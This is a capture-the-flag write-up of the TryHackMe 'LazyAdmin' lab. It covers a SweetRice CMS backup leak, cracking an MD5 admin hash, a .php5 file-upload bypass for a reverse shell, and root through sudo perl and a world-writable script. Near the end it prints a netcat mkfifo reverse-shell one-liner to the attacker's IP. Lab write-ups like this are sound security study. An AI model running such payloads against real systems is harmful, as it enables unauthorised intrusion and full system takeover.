TryHackMe - LazyAdmin (Easy)
{"author" : ["ret2basic"]}

Summary

Gobuster finds a hidden directory /content that leaks CMS name. Searchsploit finds an exploit that leads us to a MySQL backup file, which leaks admin user's password hash. The password hash is just MD5 and we recover the plaintext password easily. Running Gobuster on /content , we find another hidden directory /content/as that has a login form. Using the leaked credential, we can access the admin panel.
In the admin panel, we find a file upload vulnerability and an easy file extension bypass. Upload php-reverse-shell.php5 and get a reverse shell as www-data.
In the privilege escalation phase, sudo -l finds that we are able to execute Perl as root. There is a backup script that executes /etc/copy.sh as root and /etc/copy.sh is world-writable. Store a Netcat reverse shell payload in it and run sudo perl on the backup script. Then we catch a reverse shell as root.

IP

    RHOST: 10.10.10.20
    LHOST: 10.13.12.2

Nmap

Nmap

Directory Fuzzing

Gobuster finds a hidden directory /content:
Gobuster
Visit http://lazyadmin.thm/content/. The CMS used is SweetRice:
SweetRice

Admin Panel: Leaked Credential from MySQL Backup

Searchsploit:
searchsploit
The "Backup Disclosure" PoC says that MySQL backup is at /inc/mysql_backup. In our case, it is at /content/inc/mysql_backup. Try to access this directory:
/content/inc/mysql_backup
The manager user's password hash is leaked in this backup:
Password hash
MD5 reverse hash lookup shows that the plaintext password is Password123, so the credential is manager:Password123. Now we need to find a login page to utilize this credential.
Run Gobuster on the directory /content and we find a new directory /content/as:
Gobuster on /content
This directory has a login form:
/content/as
Try the credential we just found and now we have access to the admin panel:
Admin Panel

www-data Shell: File Upload

There is an arbitrary file upload exploit for SweetRice:
Arbitrary file upload
It suggests .php5 bypasses the filter:
.php5
Rename php-reverse-shell.php to php-reverse-shell.php5, go to "Media Center", and upload it:
File upload
Start a pwncat listener and catch a reverse shell as www-data:
www-data shell

Privilege Escalation: Sudo Perl => World-Writable File => Reverse Shell

sudo -l:
sudo -l
The file /home/itguy/backup.pl executes sh /etc/copy.sh as root and /etc/copy.sh is world-writable:
/etc/copy.sh
Store a Netcat reverse shell payload is /etc/copy.sh:
1
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.12.2 1337 >/tmp/f' > /etc/copy.sh
Copied!
Start a pwncat listener and execute backup.pl as root:
1
sudo /usr/bin/perl /home/itguy/backup.pl
Copied!
Now we have a root shell:
root shell
Last modified 2mo ago